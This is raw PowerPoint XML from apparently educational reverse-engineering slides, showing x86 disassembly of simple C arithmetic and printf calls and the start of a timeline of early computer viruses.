              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3923928" y="3965104"/>
            <a:ext cx="4835363" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401006 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401017 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>ebp-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401020 push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401021 push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>aTotalD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"total = %d\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401026 call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631550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Recognizing C/C++ structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Operation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1916832"/>
            <a:ext cx="1944216" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> a = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> b = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a = a + 11;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a = a - b;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a--;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>b++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>b = a % 3;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139952" y="1340768"/>
            <a:ext cx="3888432" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401006 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040100D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_8], 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401017 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 0Bh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040101D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401020 sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_8] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401023 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401026 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401029 sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040102F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401032 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401035 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_8], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401038 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040103B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>cdq</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040103C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401041 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401043 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ebp+var_8], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242586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Computer Virus &amp; Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1949, John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>von Neumann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Theory and Organization of Complicated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Automata” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1971, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Creeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>(Bob Thomas at BBN Technologies) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>able to move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>between computers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1974, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Wabbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>A self-replicating program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>copied itself until </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>it bogs down the system </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1982, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>Elk Cloner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>: Written by a 15-year-old, Elk Cloner is one of the earliest widespread, self-replicating viruses to affect personal computers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>1986, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Fred Cohen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Coined the term “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t>” in his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Ph.D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
              <a:t> thesis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>1986 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0"/>
              <a:t>–  Brain Boot Sector Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Generally regarded as the first virus to infect MS-DOS computers</a:t>
            </a:r>
            <a:r>
